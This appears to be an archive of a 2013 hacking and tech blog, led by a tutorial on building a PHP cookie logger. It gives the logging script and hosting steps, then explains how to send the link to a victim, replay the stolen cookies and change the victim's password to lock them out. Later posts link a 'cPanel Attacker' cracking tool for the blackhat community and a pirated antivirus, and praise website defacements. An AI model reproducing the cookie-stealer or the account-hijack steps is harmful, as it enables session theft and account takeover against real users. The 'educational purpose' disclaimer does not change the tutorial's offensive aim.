Tuesday, January 29, 2013

What is Cookie Logger Or Cookie Stealer?

Hi Guys... This is DJ Alone... as Per I Promised That i Will Post Cookie Logger / Cookie Stealer Tutorial...Here is This Tutorial For You...

First Of All Let Me Say Clearly... I'm Not Encourging U TO Do This...

Note :- This Tutorial is For Education Purpose Only... & Its For Better Security For Ur Self...

Now Let's Move To The Topic...


What is Cookie Logger / Cookie Stealer ???


A Cookie Logger Or Cookie Stealer is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim...

So, Today I Will Help U Guys in Making Ur Own Cookie Logger...So , Enjoy...

Step 1 :- Download The Script From Below Link and Rename it To Alone.GIF  (what ever u wanna save)...

http://www.mediafire.com/?s13y1lrpx8hc6h0

Step 2 :- Then Copy The Following Script Into NotePad & Save It As CookieLogger.PHP  (whatever u wanna save)...


$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3 :- Create a New Text File & Save it As logfile.txt

Step 4 :- Now Upload The Following Files To Ur Hosting Site... Like 000WebHost Or MY3GB...


cookielogger.php :- http://www.t3chnohacker.blogspot.com/cookielogger.php

logfile.txt :- http://www.www.t3chnohacker.blogspot.com/logfile.txt (chmod 777)

Alone.gif :- http://www.t3chnohacker.blogspot.com/alone.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://my3gb.com
http://000webhost.com

* Rename T3chno Hacker To Ur Website...

Step 5 :- Now Ur Cookie Logger / Cookie Stealer  is Ready To Be Used... Now All U Had To Do is Find The Victim & Try Cookie Logger / Cookie Stealer On Them...

Note :- Give Ur Victim The Link Of GIF File...

Step 6 :- If Ur Victim Clicks On Ur Link U Will Get His / Her Cookies...and That Cookies Will Stored In Ur Website's logfile.txt... So, The Cookie Will Looks Like Below...


u_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; 
u_sid=3bd7bdcb4e9e41737ed6eb41c43a4ec9



Step 7 :- Now All U Need To Do Is... Remove Ur Cookies Or Replace The Above Cookies With Ur Own Cookies... And Boom... Congrats U Will Succesfully Logged In To Ur Victim's Account...

Note :- Use Mozilla FireFox For This... And Use Cookie Editor ADD-ON in FireFox For Editing Cookies in Mozilla...

Step 8 :- 
For getting the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie...You can use a Cookie Editor for this...
The string before “=” is the name of the cookie and the string after “=” is its value...
So Change the values of the cookies in the cookie Editor...



Note :- Make Sure that ur Victim should be Online because u are Hijacking ur Victim’s Session...
So if the Victim clicks on Logout you will also Logout automatically...
but once you have changed the password then you can again login with the new password... but the victim would not be able to login with it...

MUST READ :- I don’t take any responsibility for what you do with this script...Its Only for Educational purpose only…


How To Get Secure From Cookie Loggers / Cookie Stealer ???

Don't Click On Any Links Given By Anyone...
Use Secure Connection Security In Facebook...
Use Login Notifications For Better Security...

Don't Click On SPAM Links Videos Or Pics...

Never Ever Try RATS or KeyLoggers...

Be Safe...Don't Use Any Softwares For Hacking...Coz All Are Fakes...

Hacking is Not Playing With SomeOne's Account... 

Real Hacking is Much More Than It...


All The Hackers are Not Same... We are Humans & We Had Heart Also...

So, Wake Up Fast... With The New Techys...

DJ Alone...





Posted By आर्यावर्त11:04 PM

Install BACKTRACK 5 on SmartPhones OR Tablets


Today we are going to see How to install backtrack  5 on Smartphones and tablets which run on android.For this we have certain Required. Ofcourse the main will be the Android smartphone with 2.1+. Though I recommend 4.0+.In my case ill be using Micromax a110 smartphone.

Requirements :

1.Back | track 5 Arm architecture which can be downloaded from the official website of the Back | track Here.
2.A smartphone/tablet which needs to be rooted since it requires root permission to run certain scripts. (micromax a110 as example)
3.Following Android Apps:
BUSYBOX : It acts like a installer and uninstaller.it needs root permission to run.it has gpu cores and can  run linux kernals on android . Link  
Superuser: This app just grants a superuser power to your phone just like “su” does for linux. Link
Terminal Emulator is app that runs a terminal console in android .Link
AndroidVNC is a tool for viewing VNC in Android. Link

Installation :

1.Extract the backtrack folder “BT5-GNOME-ARM” to folder named “BT5” on the root of sd.That’s the top level of the SD card.
2.Open up the Terminal Emulator
Screenshot_2013-01-24-19-20-20
3.Type the command “cd sdcard/BT5”
Screenshot_2013-01-24-19-21-19
4.Run this command and you will see root@localhost.
Screenshot_2013-01-24-19-23-40
su
sh bootbt
4. Now lets run Backtrack GUI with VNC viewer
 startvnc
Backtrack on Android 7
6. Open android vnc
Nickname : BT5
Password : toortoor
Address : 127.0.0.1
Port : 5901
Backtrack on Android 9
7.Click the connect Button and Boom here is your Pentest machine...
Backtrack on Android 11
Credits To :- http://defcontn.com

Posted By आर्यावर्त9:57 PM

Monday, January 28, 2013

BackBox 3.1 Released

Hi Guys...This is DJ Alone... This Post is About BackBox Linux...

Recently I Has Installed BackBox in My PC... And I'm In Love With It...

So, When I See It's New Version Released...I Had Decided To Make This Post...

BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools...
BackBox Desktop
Black Box is the another version of the Linux distribution. It is one of the Powerful Distribution of Linux for the pentester and the security assessment guys. It is totally featured with Network and informatic System Analysis tools. There are tonnes of tools that are used by an Ethical hacker and a Pentester.
Finally Black Box team have announced the new release of Black box, which is featured with Linux 3.2 and xfce 4.8...
BackBox Tools

BackBox Linux 3.1 New Features :-

1) Fixed the several Bugs

2) Improved performance

3) Improved WiFi Drivers


4) Featured with new and more powerful tools as like  Backfuzz, beef,  htexploit, metasploit, sqlmap, websploit, weevely, wpscan, zaproxy, etc...

5) Improved Auditing menu...
BackBox Terminal
BackBox Terminal

BackBox Linux 3.1 Download


Posted By आर्यावर्त9:37 PM

Sunday, January 27, 2013

Sound Search for Google Play widget, now available on Google Play

“What's this song?” Starting today, the Sound Search for Google Play widget is available to download from the Play store, so you can start identifying music playing around you, directly from your Android device’s homescreen...


Sometimes, you hear a song you like while you’re out and about but don’t want to download it right at that moment. The Sound Search widget syncs across all of your devices, so that song you recognized with your phone in the coffee shop can be quickly purchased from your tablet at home.

For devices running Android 4.2, you can add the widget directly to your device’s lockscreen, letting you recognize songs without even unlocking your phone, making it even easier for you to catch that song at the club. 

The Sound Search for Google Play widget is available on Google Play for devices in the U.S. running Android 4.0 and above. After you’ve installed it, go to the widget picker and drag the Sound Search widget onto your homescreen. You can click on the widget at any time to start recognizing music around you...

Posted By आर्यावर्त11:12 PM

Gorgeous iPhone 6 Concept Based on new iPod nano Design


The Tech Giant Apple is considered to have marketed in more than 50 thousand iPhones last qaurter, there are still many experts out there that believe both the device, and the application it operates, are getting a bit lengthy in the teeth.
This is why we keep seeing ideas for new iPhones and iOS functions with rejuvenated styles. Actually, a new one jumped up last night that gives the smart phone an all new look  quite similar to the 7th gen iPod nano…
These new iPhone 6 renderings come from the well-known Federico Ciccarese. He has attracted up a variety of the Apple company item ideas for us over the decades, such as these well-known iPad mockups.
As always, Federico’s innovative iPhone impact is stunning. I’m actually really searching the iPod nano-like style. It type of informs me of a higher-end HTC, Lumia, and seems like it’d be really simple to keep and wallet...
The OS you see operating on the device is what he phone calls “iOSX,” a mixture of iOS and OSX. I do not really like the bigger symbols, they are type of awkward. But I would not think if iOS is getting more performance.
All informed, I really like this idea, and I would not really mind if the Silicon Valley giant obtained from it. Latest gossips say it’s looking to up the handset’s launch pattern to every 6 several weeks, so we could actually see a upgrade as beginning as this season.
Credits To :- Anchit Shethia...

Posted By आर्यावर्त9:05 PM

Saturday, January 26, 2013

ESET Smart Security 6.0.308.0 Full Version x86 & x64 (Resume Link)

Filled under: ,


ESET Smart Security offers advanced detection technologies and multi-layered security features... Designed for a low footprint, fast scanning, it packs security features and customization options for consistent and personalized security on- or offline. ESET Smart Security is built on ESET’s unique heuristic technology that identifies viruses that have never been seen before. This enables them to protect your computer proactively, in real-time, against new viruses and cyber threats that conventional signature-based antivirus products don’t catch. ESET Smart Security has all the same features as ESET NOD32 Antivirus with the addition of parental controlsantispam module, and an intelligent firewall.
Changes in 6.0.308.0:
Fix: Outlook plugin crashed in specific situations
Fix: SSL scanning issue with certain type of data
NOTE: Download, unRAR, check READ ME file..
- Language: English (x86 and x64 version included)
Enjoy…

Posted By आर्यावर्त4:39 AM

WHAT IS NEED OF ROOTING IN ANDROID

Hi guys, This is DJ Alone... I think you should read this post before rooting your android phone or tablet. If you are an android user then you heard ROOT term many times but what is the actual meaning of rooting. Ok, So lets start the discussion about Rooting and its advantages and disadvantages...

What Is Rooting In Android ?

Android Rooting is the process to gain the access of superuser on your android phone...

Now you will think who is the superuser...

OK let me know you...Superuser is the special type of user account in an operating system used for system administration...In Android superuser is also known as ROOT...



Why We Need To Do ROOTING ?


The basic need of rooting in android is to gain the power of admin so that we can install the apps which ask for root access...
Rooting is used to overcome all the limitations by the device manufacturers...



Advantage Of Rooting...

Rooting Help to gain the power of superuser...
User can customize his device according to his wish...
Rooting helps the user to Free Up device memory, User can directly install the apps on his SD Card...
Rooting Help the user to customize phone  performance...
Rooting Allow the user to install custom ROM...



Dis-Advantages Of  Rooting...

It breaks device warranty immediately,User can not complaint to his device manufacturer for any error after rooting his phone...
Rooting decreases device life...
Danger of viruses or malwares increased after rooting...
It involves the Risk of Phone BRICKING...



" SHARE IT IF YOU LIKE IT ..."

Coming Soon :- In Next Post I Will Show How To Root Ur Phone...





Posted By आर्यावर्त4:27 AM

How to add AdSense to WordPress

WordPress Is Now Widely Used...Cause WordPress Is Easy & Good...With WordPress you can easily add your AdSense code to your blog... In order to do this, first login to the administrative end of your website. Then, go to the Appearance -> Widgets menu...
In this page select to drag-and-drop a "Text" widget onto your registered sidebar...

Then you should add a title (in our case - Advertisement) and right under it the actual code that you have obtained from Google. Finally, click on the on the "Save" button right under it...

Well done! You have just added your AdSense code to your WordPress blog...

Posted By आर्यावर्त3:47 AM

Friday, January 25, 2013

Several Websites Hacked By Indian Hacker To Celebrate Republic Day


An Indian hacker going by the name of Death Burner has defaced 14 websites to celebrate and wish other Indian hackers happy Republic Day.With an Indian flag in the middle of the defaced page,he added some wordings which goes as follows:
"Dedicated To All The Brave hearts who lost life for the country
-happy replublic day-
Greetz 2 all indian hacker
"

Full list of all websites defaced:-

Posted By आर्यावर्त10:52 PM

Thursday, January 24, 2013

Micromax CANVAS 3 Specifications - The Phone That Can

Micromax Is One Of The Leading Company In Indian Mobile Manufacturer...This Company Got Famous For Their Low Cost Android Phones & Tablets... Recently They Started To Made Smart LED TVs With Their Own Trademark Technology AVEA Engine..Most Indian People Love It Cause Micromax Is Fullfilling There Needs With Low Cost in Compare With Other Brands in Market... Recently Micromax Has Launched Micromax Canvas 2 (A110)... And They Got a Good Market... The Company Also Said That "We Are Selling 5,500 Canvas 2 Phones Daily In INDIA"...Micromax is Now Working On There New Version Canvas 3...Micromax is Highly Focusing On There "Canvas" Series...

So, Lets Move To The Canvas 3...
Micromax Canvas 3 Front
As U Can See From Front Their Are Lots Of Improvements Doned At Front...The Soft Buttons Are Also Removed & Replaced With Software Integrated Buttons...This Helps It To Reduce Height & Length Of The Device...and Make It More Comforatable To Hold In Hands...The Great Feature is U Dont Need To Adjust Brightness When U Go Outside...
Details
Micromax Canvas 3 Is Powered by a Mediatek Quad Core processor...Canvas 3 is much faster & power saving device...new Cortex-A7 architecture...This is one of the low cost quad core chip in the world...& the most interesting one is the "AVEA" engine... Similar to the Sony Bravia...

Full List of Detailed Specifications :-

143x76.5x9.6 mm...

5" IPS LCD capacitive toucscreen...
720x1280 Resolution 294 ppi...
Micromax AVEA Mobile engine...
Corning Gorilla Glass 1...

1.2 GHz Quad Core CPU (Cortex A7)...
Mediatek MT6589 Chipset...
PowerVR SGX544 GPU...

1GB RAM...
8GB internal memory (6GB user available)
Micro SD card support up to 32GB

8 Mega Pixel Camera, Dual LED flash...
720p Video recording@30fps...
1.3 MP front facing camera...
Dedicated shutter key...

GPRS,EDGE,HSPDA,HSUPA,LTE...
Bluetooth 4.0,Wi-Fi,Hotspot,DLNA...

Android 4.1.2 Jelly Bean...

Dual SIM...
  Ambient Light sensor,Proximity sensor,Accelerometer,G-Sensor...

2600mAh Li-ion battery...


Price - 15,000 INDIAN RS...
Micromax Canvas 3 Back





Posted By आर्यावर्त4:53 AM

Wednesday, January 23, 2013

Platinum Hide IP 3.2.4.2 - Download (Mediafire Link)

Key Features
  • Anonymize Your Web Surfing
  • Your real IP is hidden when you surf on the Internet, keeping your online activity from being tracked by others.
  • Protect Your Identity
  • Anonymous web surfing enables you to prevent identity thieves from stealing your identity or other personal information, and keep your computer safe from hacker attacks or other risks.
  • Choose IP Country and Check IP
  • Proxy lists of many countries are enabled and you decide to select one country from the Choose IP Country window. You can check the current IP address directly.
  • Send Anonymous Emails
  • Send anonymous emails through any web based mail system such as Gmail, Hotmail, etc.
  • Get Unbanned from Forums and Blocked Websites
  • Change your IP address and then you can get unbanned yourself from any forums or other blocked websites that have ever banned you from...


Posted By आर्यावर्त1:00 AM

Tuesday, January 22, 2013

aTorrent PRO 2.0 - Torrent App For Android

aTorrnet PRO Version 2.0.1.4

Added Features :-

  • +Ratio, Uploaded added...
  • Download by Wi-Fi fixed...

aTorrent – Torrent App is for Download big files to your phone or tablet...

aTorrent PRO – Native P2P BitTorrent Software for Android devices. Download files with ease right to your phone or tablet!
Professional (Ad-free) version...


Features :-
  • Torrent search dialog...
  • Open torrents right from browser...
  • Magnet links support...
  • Add torrent from file..
  • Choose download folder...
  • Partial download (choose files from torrent)...
  • Multiple parallel downloading...
  • Option to limit downloads by Wi-Fi...
  • Option to pause downloads when external power supply is not connected...
  • Supported protocols: BitTorrent P2P, DHT, Advanced DHT Bootstrap, Magnet links, HTTP & UDP Trackers...
  • Large files support (for FAT32 SD cards – 4Gb maximum, for internal storage – unlimited file size)...

Posted By आर्यावर्त10:43 PM

Download Torrents in IDM 1MBPS Speed

Hey Guys This Is DJ Alone...

I Got A Surprise For U All My Readers...

This Post is For Those Torrent Lover's...

I Just Want To Share a Best Torrent Leech Site With U Guys...

Just Copy Ur Torrent Link Into It And Paste In It...

The Servers Of That Site Will Download That File For You... And Then U Can Download From Them...

The Site is ZZLBOX
Login Or SignUp There...For SIGNUP Use FURK.NET....


If U Had FURK.NET Account U Can Also Use It in ZZLBOX...
After Logged In Goto Add Files...



Now Add Ur Torrent Link And Click On Add Files...

Then U Can Click On Download & It Will Started...



Here Is A Screenshot Of Speed That What I Got From It...




Note :- Downloading Speed is Depends On Ur Internet Provider...

A Little Restrictions Of ZZLBox (Furk.Net)...

1 GB Per Day Bandwidth...











Posted By आर्यावर्त4:47 AM

Sunday, January 20, 2013

cPanel Attacker v4.05

Filled under: ,

There was a lot of rush going around the blackhat community about a cPanel Cracker which is not a PHP script and it is a software for windows which is fully portable and you can carry it just in your portable drive. This is the advanced version 4.05 of the renowned cPanel Attacker used for cracking cPanels.
See the Screenshot :

Download it Here:


NOTE :- Some antivirus detects it as virus but its safe. I tried this on myself and it is working perfectly as the screenshot above shows...


Posted By z0mb1311:25 AM

Jelly Bean For Galaxy S II Releasing in February

Samsung Galaxy S Have Crossed 100 Million Global Sales...This Annoucement Has Been Doned By Samsung...

Previouly Samsung Has Promised That They Will Release Newer Operating System For Galaxy S II...And Now Samsung Has Confirmed That Android Jelly Bean (4.1) Will Be Arrive To Samsung Galaxy S II During The Month Of February...

The Official Version Of Jelly Bean For Samsung Galaxy S II is Android 4.1.2...And Most Likely It Will Be The Last Received Update For That Device..And This Update Will Not Be Received via OTA...But It Will Received Via Samsung Kies...

Posted By आर्यावर्त1:32 AM

Cyber Ghost VPN Be Anonymous On Internet

Hi Guys... This is DJ Alone...

This article will prepare you to hide your IP address and surf the internet anonymously...

Among the top VPN tools available, CyberGhostVPN provides the easy way to hide your IP, so that you make your computer anonymous online. This tool will encrypt your incoming/outgoing data transmition with special mechanism that makes a computer behind a series of proxy servers, providing the untraceable communication paths. CyberGhost is one of the favorite tool of Hackers, used for the said purposes. Below is the step by step procedure of how you can go with CyberGhost VPN.


1. First, download the soft from here...

http://cyberghostvpn.com/en/product/download.html

2. After you downloaded, run the installer. The installation process is simple, as usual...

3. After installation, make your account here...
http://cyberghostvhackingpn.com/page/registration.php

4. After your account is up, go and run the desktop shortcut for CyberGhost VPN... After running the program, you will see the following screen, be patient for a minute !

5. After a little wait, a wizard is started, click on Cancel, because we already maded our account in step 3...

6. Enter your username and password, that you made earlier and click on Log in...

7. After you logged in successfully...

8. Here you will see your current IP address. Next, click on "Connect to VPN" button, and choose "Connect to free service" from the short menu...

A window may appear now, after waiting a bit, you will see your process of getting a fake IP, is completed... You are anonymous now & Connectd To Cyber Ghost VPN...



Note :- You can click on Hide at the top right, to hide the CyberGhost window... But Don't click on close...Or It Will Get Disconnected...

Goto http://whatismyipaddress.com/ to confirm whether your IP is changed or not...

Posted By आर्यावर्त12:56 AM

Saturday, January 19, 2013

How To Secure Your WORDPRESS WebSites

Hello Guys,...This is DJ Alone...

Today I'm going to tell you the most important steps to do to have a more secured Wordpress blog. I think wordpress is the most used Webapps on cyber now; however, it's almost the easiest to be hacked and defaced! But, on the other hand, securing your wordpress is so easy. specially on linux servers...


Note:- This tutrotial is based on linux commands...so, if you're a windows server user this tutorial is not for you... 

so, lets start with our steps...


1. Harder & Longer Password

 Wordpress Hashes are so hard to crack (hardest for me xD) so making you password harder than "123456" , "admin" , "password" could help you ALOT! The first thing a hacker would do is guess your password, if he failed he'll brute force it! Hard password can save you from almost 50% of the attacks ! (In My Point of view ) When we say "hard password" it means using special characters like (@, () , [] , {} , ^ , % ,$ ,#,!,) and so on.. A longer password would not only secure you from Brute forcing, but even if you have a vulnerability like SQL injection for example and the attacker got a hash of your password (which is a Long and Full of special characters password) it would be hard as hell to crack it! and it will take them forever to crack it...


2. Securing From Symlink 

Symlink is the most common way of hacking nowadays, and securing your website from it is will help you much! For those who don't know what symlinking is can read my Symlink tutorial here.  now to secure your blog from this kind of attack, you just have to change the permissions of you configuration file. You can do that though FTP, Cpanel, a shell, etc.  just change the configuration file (wp-config.php in your case =) ) to 400
you can do that in a shell by running this command: 
chmod 400 wp-config.php
and other ways are easy, just press on the option and change (in FTP and cpanel) and always remember to remove your shell as soon as you finish working on it! xD  Chmoding this file to 400, will not allow the attack to read your configuration file from another user! and that's about it...


3.Security From Deface

 If a hacker managed to get in your admin panel (somehow)...maybe through a Trojan on your PC or something you should close all the ways that let him upload a shell or deface your website! What you can do it change the permission of all the pages (index.php, 404.php, footer.php, etc etc) in the theme to 400 (Example: chmod 400 page.php) or through your ftp or cpanel because if those files are writable there is a big change that the attacker change their source to a shell source code and deface you...



4. Finding Vulnerability & Removing It

Scan it every month just to check if any plugin have any vulnerability or something. that will make you faster than the hacker by discovering the vulnerability and patching it before someone else exploit it. and second thing you want to do is being up-to-date with 133day.com and Wordpress forums they post any discovered vulnerability and sometimes its patches. This will help you to be less exploitable....


5. Some Quick Tips

 NEVER use the same password in two different things that is related to your website....for example your Database's password & Cpanel's password, website's password and Database's password... Always use different passwords...Disable FTP when there is no use of it...Don't use "admin" or "administrator" as your username...Change Admin Panel's Password every two weeks....

Read this article on Wordpress official website (Click Here) For more security Following the above steps can prevent almost 98% of the attacks on your wordpress blog :) Hope you liked it! thanks for reading....


Credits To :- http://securitygeeks.net/

Posted By आर्यावर्त11:58 PM